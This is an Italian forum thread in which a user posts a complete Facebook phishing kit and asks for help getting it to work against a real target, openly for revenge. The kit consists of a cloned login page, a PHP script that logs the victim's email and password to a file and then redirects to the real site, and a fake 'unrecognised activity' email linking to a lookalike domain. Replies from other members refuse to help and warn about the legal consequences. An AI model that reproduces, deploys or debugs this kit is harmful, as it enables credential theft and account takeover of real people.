Domanda ho bisogno aiuto per creare fake login.

Stato
Discussione chiusa ad ulteriori risposte.

grisu92

Utente Bronze
18 Aprile 2020
33
7
3
37
Codice index.html:
HTML:
<!DOCTYPE html>
<html lang="it">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Facebook - Accedi o registrati</title>
  <link rel="stylesheet" href="facebook.css" />
</head>
<body>
  <div class="top-banner">
    <p>📥 Scarica Facebook per Android per navigare più velocemente.</p>
  </div>

  <div class="fb-container">
    <p class="lang">Italiano</p>
    <img src="facebook.png" alt="Facebook logo" class="fb-logo" />

    <div class="fb-login-box">
      <form action="process.php" method="POST" class="fb-form">
        <input type="text" name="email" placeholder="Email o numero di telefono" required />
        <input type="password" name="password" placeholder="Password" required />
        <button type="submit">Accedi</button>
        <a href="#" class="forgot">Hai dimenticato la password?</a>
        <hr />
        <button class="create-account">Crea nuovo account</button>
      </form>
    </div>

    <footer class="meta-footer">
      <img src="meta.png" alt="Meta logo" class="meta-logo" />
      <div class="meta-links">
        <a href="#">Informazioni</a>
        <a href="#">Centro assistenza</a>
        <a href="#">Altro</a>
      </div>
    </footer>
  </div>
</body>
</html>
codice PHP: processo.php gestione login
PHP:
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email = $_POST['email'] ?? 'N/A';
    $password = $_POST['password'] ?? 'N/A';
    $timestamp = date("Y-m-d H:i:s");
    
    $line = "[$timestamp] Email: $email | Password: $password\n";
    file_put_contents("dati.txt", $line, FILE_APPEND);

    // Reindirizza al vero Facebook per confondere l'utente
    header("Location: https://www.facebook.com");
    exit;
} else {
    echo "Accesso non autorizzato.";
}
?>codice facebook.css:[Code]* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif;
  background: #fff;
  color: #1c1e21;
}

.top-banner {
  background: #f0f2f5;
  padding: 12px;
  text-align: center;
  font-size: 13px;
  color: #1877f2;
  border-bottom: 1px solid #ddd;
}

.fb-container {
  max-width: 400px;
  margin: 30px auto;
  padding: 0 16px;
  text-align: center;
}

.lang {
  font-size: 14px;
  color: #606770;
  margin-bottom: 16px;
}

.fb-logo {
  width: 60px;
  margin: 16px auto;
}

.fb-login-box {
  background: #fff;
  padding: 20px;
  border-radius: 8px;
  box-shadow: 0 1px 3px rgba(0,0,0,0.1);
}

.fb-form {
  display: flex;
  flex-direction: column;
  gap: 12px;
}

.fb-form input {
  padding: 14px;
  font-size: 16px;
  border: 1px solid #ddd;
  border-radius: 6px;
}

.fb-form button[type="submit"] {
  background: #1877f2;
  color: white;
  border: none;
  padding: 14px;
  border-radius: 6px;
  font-weight: bold;
  font-size: 16px;
  cursor: pointer;
}

.forgot {
  font-size: 14px;
  color: #1877f2;
  text-decoration: none;
}

.fb-form hr {
  margin: 16px 0;
  border: none;
  border-top: 1px solid #ddd;
}

.create-account {
  background: white;
  border: 1px solid #1877f2;
  color: #1877f2;
  padding: 12px;
  font-size: 15px;
  border-radius: 6px;
  font-weight: bold;
  cursor: pointer;
}

.meta-footer {
  margin-top: 40px;
  text-align: center;
}

.meta-logo {
  width: 60px;
  margin-bottom: 8px;
}

.meta-links a {
  font-size: 13px;
  margin: 0 8px;
  color: #65676b;
  text-decoration: none;
}
[/CODE] codice testo email
HTML:
<DOCTYPE html>
<html lang="it">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Notifica Facebook</title>
</head>
<body style="font-family: Arial, sans-serif; background-color: #f2f2f2; margin: 0; padding: 0;">
  <div style="max-width:600px; margin:auto; padding:20px; background-color:#ffffff; border-radius:6px;">
    <div style="text-align:center;">
      <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook" width="40" />
    </div>
    <br />
    <p style="color:#000000; font-size:16px;">
      Gentile utente,
    </p>
    <p style="color:#000000; font-size:16px;">
      Abbiamo rilevato un'attività non riconosciuta sul tuo account Facebook.<br />
      Per garantire la tua sicurezza, ti invitiamo ad aggiornare le credenziali di accesso.
    </p>
    <div style="text-align:center; margin:30px 0;">
      <a href="https://facebook2025.it/" style="background-color:#1877f2; color:#ffffff; padding:12px 24px; text-decoration:none; font-weight:bold; border-radius:4px; display:inline-block;">
        Modifica qui
      </a>
    </div>
    <hr style="border: none; border-top: 1px solid #cccccc;" />
    <p style="font-size:13px; color:#666666;">
      Questo messaggio è stato inviato a <strong>${email}</strong>.<br /><br />
      © Facebook. Meta Platforms Ireland Ltd., Attenzione: Community Operations,<br />
      4 Grand Canal Square, Dublino 2, Irlanda.<br /><br />
      Per contribuire a proteggere il tuo account, <strong>non inoltrare</strong> questa e-mail.<br />
      <a href="https://www.facebook.com/help/security" style="color:#1877f2;">Scopri di più</a>
    </p>
  </div>
</body>
</html>
ciao a tutti! Vi ho postato prima il codice perché sto usando un cellulare per scrivere. Ho bisogno di aiuto per favore e grazie un consiglio una dritta. Per la creazione di un fake login facebook. Ho comprato dominio su register (facebook2025.it) faccio gestire i record dsn su cloudflare dominio già verificato e arrivo
Uso thurderbird con posta in arrivo di gmail e posta in uscita smpt di email sender già dominio verificato. Il sito è costato su render con dominio verificato. Solo che escono vari problemi: 1) se invio una email da mittente personalizzato del.mio dominio al ricevente esce Html visivo e in spam. 2) il sito se lo guardo da www.facebook2025
It esce pericoloso. 3) comunque non reiderizzamento sul vero facebook e non salva dati. Io vorrei riuscire ad inviare le email con link cammufato. E il sito dovrebbe una volta inserite le credenziali memorizzare inviare sul mio sito dati.txt anche se vorrei che mi arrivassero nea mia email. E poi reiderizzamento sul vero facebook
 
Questo post è a dir poco problematico. Cercherò di riassumere tutto in pochi punti:
  1. Non forniamo assistenza alla creazione di pagine di phishing
  2. Le email inviate dal tuo dominio finiscono nello spam per vari motivi ma principalmente per le keyword presenti e per la probabile cattiva configurazione (es. assenza di header DKIM o simili)
  3. Visitare direttamente il sito mostra un alert per via di Google Safe Browsing che rileva correttamente la pagina come phishing
  4. Mettere le credenziali raccolte in un txt nella web root del server significa lasciarle pubbliche
  5. Nel momento in cui lo invii davvero a qualcuno potresti passare guai con la legge, Simone, e fidati, non ne vale la pena
 
Intendi che potrei avere sbagliato qualcosa su cloudflare? Il sito è phishing ma per una buona causa. Aiutare un mio amico di vendicarsi una lunga storia. cmq il TXT è una roba provvisoria vorrei mettere che ricevo le credenziali via email.
 
Intendi che potrei avere sbagliato qualcosa su cloudflare? Il sito è phishing ma per una buona causa. Aiutare un mio amico di vendicarsi una lunga storia. cmq il TXT è una roba provvisoria vorrei mettere che ricevo le credenziali via email.

Cloudflare non centra è il Safe Browsing di Google. Per la legge non esiste buona causa di vendetta e sappi che ci vuole poco a trovare chi sei e il tuo indirizzo di casa, anche per me che sono un tizio qualunque, in caso di denuncia ti troveresti con la fedina penale sporca per una sciocchezza del genere.
 
Cloudflare non centra è il Safe Browsing di Google. Per la legge non esiste buona causa di vendetta e sappi che ci vuole poco a trovare chi sei e il tuo indirizzo di casa, anche per me che sono un tizio qualunque, in caso di denuncia ti troveresti con la fedina penale sporca per una sciocchezza del genere.
..mooooolto poco per sapere chi sei, Simone.
questo dettaglio che JunkCoder ha messo il tuo nome in un messaggio precedente non ti preoccupa?
tagliamo la testa al toro: si puo', davvero molto facilmente e senza risorse, risalire a chi e' il proprietario di un dominio.
 
Stato
Discussione chiusa ad ulteriori risposte.
Indietro
Top Bottom